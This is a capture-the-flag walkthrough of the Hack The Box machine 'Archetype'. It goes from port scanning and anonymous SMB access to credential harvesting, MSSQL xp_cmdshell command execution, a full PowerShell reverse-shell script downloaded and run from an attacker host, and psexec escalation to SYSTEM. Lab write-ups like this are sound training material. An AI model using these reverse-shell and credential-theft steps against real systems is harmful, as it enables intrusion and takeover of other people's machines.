Archetype
HTB - Archetype
  1. 1.
    Scan with nmap:
    [email protected]:~$ nmap -T4 -A -p- 10.10.10.27
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-03 17:58 EDT
    Nmap scan report for 10.10.10.27
    Host is up (0.042s latency).
    Not shown: 65480 closed ports, 43 filtered ports
    PORT STATE SERVICE VERSION
    135/tcp open msrpc Microsoft Windows RPC
    139/tcp open netbios-ssn Microsoft Windows netbios-ssn
    445/tcp open microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds
    1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000.00; RTM
    | ms-sql-ntlm-info:
    | Target_Name: ARCHETYPE
    | NetBIOS_Domain_Name: ARCHETYPE
    | NetBIOS_Computer_Name: ARCHETYPE
    | DNS_Domain_Name: Archetype
    | DNS_Computer_Name: Archetype
    |_ Product_Version: 10.0.17763
    | ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
    | Not valid before: 2020-05-03T17:16:49
    |_Not valid after: 2050-05-03T17:16:49
    |_ssl-date: 2020-05-03T22:15:41+00:00; +14m18s from scanner time.
    5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
    |_http-server-header: Microsoft-HTTPAPI/2.0
    |_http-title: Not Found
    47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
    |_http-server-header: Microsoft-HTTPAPI/2.0
    |_http-title: Not Found
    49664/tcp open msrpc Microsoft Windows RPC
    49665/tcp open msrpc Microsoft Windows RPC
    49666/tcp open msrpc Microsoft Windows RPC
    49667/tcp open msrpc Microsoft Windows RPC
    49668/tcp open msrpc Microsoft Windows RPC
    49669/tcp open msrpc Microsoft Windows RPC
    Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
    Host script results:
    |_clock-skew: mean: 1h38m18s, deviation: 3h07m51s, median: 14m17s
    | ms-sql-info:
    | 10.10.10.27:1433:
    | Version:
    | name: Microsoft SQL Server 2017 RTM
    | number: 14.00.1000.00
    | Product: Microsoft SQL Server 2017
    | Service pack level: RTM
    | Post-SP patches applied: false
    |_ TCP port: 1433
    | smb-os-discovery:
    | OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
    | Computer name: Archetype
    | NetBIOS computer name: ARCHETYPE\x00
    | Workgroup: WORKGROUP\x00
    |_ System time: 2020-05-03T15:15:32-07:00
    | smb-security-mode:
    | account_used: guest
    | authentication_level: user
    | challenge_response: supported
    |_ message_signing: disabled (dangerous, but default)
    | smb2-security-mode:
    | 2.02:
    |_ Message signing enabled but not required
    | smb2-time:
    | date: 2020-05-03T22:15:33
    |_ start_date: N/A
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 187.16 seconds
  2. 2.
    Nessus scan for fun Start with sudo /etc/init.d/nessusd start and go to https://kali:8834
  3. 3.
    Samba is open so lets see is anonymous login enabled and list the shares
    smbclient -L \\\\10.10.10.27\\
    anonymous (or use -N in above command for anonymous login)
    Result: backups directory found
    See inside backups: smbclient -N \\\\10.10.10.27\\backups. There is a dtsConfig file, which is a config file used with SSIS:
    get prod.dtsConfig
    exit
    cat pro.dtsConfig
    ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
    Result: Contains credientials for user ARCHETYPE\sql_svc with password M3g4c0rp123.
  4. 4.
    Target is running Microsoft SQL Server 2017 14.00.1000.00 per the nmap scan. Searching for exploit reveals Rapid 7 and HackTricks Book
    • HackTricks had command to gather info about the service: nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=ARCHETYPE\sql_svc,mssql.password=M3g4c0rp123,mssql.instance-name=ARCHETYPE -sV -p 1433 10.10.10.27 which was not helpful since it is similar to the -A flag.
    • Attempt Metasploit exploit:
      sudo msfconsole
      search mssql
      use exploit/windows/mssql/mssql_payload
      options
      set username sql_svc
      set password M3g4c0rp123
      set rhosts 10.10.10.27
      set USE_WINDOWS_AUTHENT true
      set payload windows/meterpreter/reverse_tcp
      options
      run
      Possibly could use set payload windows/shell_reverse_tcp Failed.
    • Manual Exploit
      • Let's try connecting to the SQL Server using Impacket's mssqlclient.py: python3 mssqlclient.py ARCHETYPE/[email protected] -windows-auth`
      • We can use the IS_SRVROLEMEMBER function to reveal whether the current SQL user has sysadmin (highest level) privileges on the SQL Server. This is successful, and we do indeed have sysadmin privileges. This will allow us to enable xp_cmdshell and gain RCE on the host. Let's attempt this, by inputting the commands below.
        EXEC sp_configure 'Show Advanced Options', 1;
        reconfigure;
        sp_configure;
        EXEC sp_configure 'xp_cmdshell', 1
        reconfigure;
        xp_cmdshell "whoami"
      • Save following as shell.ps1: [email protected]:~$ cat shell.ps1 $client = New-Object System.Net.Sockets.TCPClient("10.10.15.117",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
      • Next, stand up a mini webserver in order to host the file. We can use Python: python3 -m http.server 80
      • After standing up a netcat listener on port 443: nc -lvnp 443
      • We can now issue the command to download and execute the reverse shell through xp_cmdshell: xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.15.117/shell.ps1\");"
      • A shell is received as sql_svc, and we can get the user.txt on their desktop.
  5. 5.
    Privilege Escalation
    • As this is a normal user account as well as a service account, it is worth checking for frequently access files or executed commands. We can use the command below to access the PowerShell history file: type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt Result: net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!!
    • This reveals that the backups drive has been mapped using the local administrator credentials. We can use Impacket's psexec.py to gain a privileged shell.
      [email protected]:~/Downloads/impacket-0.9.21/examples$ python3 psexec.py [email protected]
      Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
      Password: MEGACORP_4dm1n!!
      [*] Requesting shares on 10.10.10.27.....
      [*] Found writable share ADMIN$
      [*] Uploading file tHaoJdVi.exe
      [*] Opening SVCManager on 10.10.10.27.....
      [*] Creating service JESk on 10.10.10.27.....
      [*] Starting service JESk.....
      [!] Press help for extra shell commands
      Microsoft Windows [Version 10.0.17763.107]
      (c) 2018 Microsoft Corporation. All rights reserved.
      C:\Windows\system32>whoami
      nt authority\system
    • Get flag
      cd C:\Users\Administrator\Desktop
      type root.txt
      b91ccec3305e98240082d4474b848528
Copy link
Edit on GitHub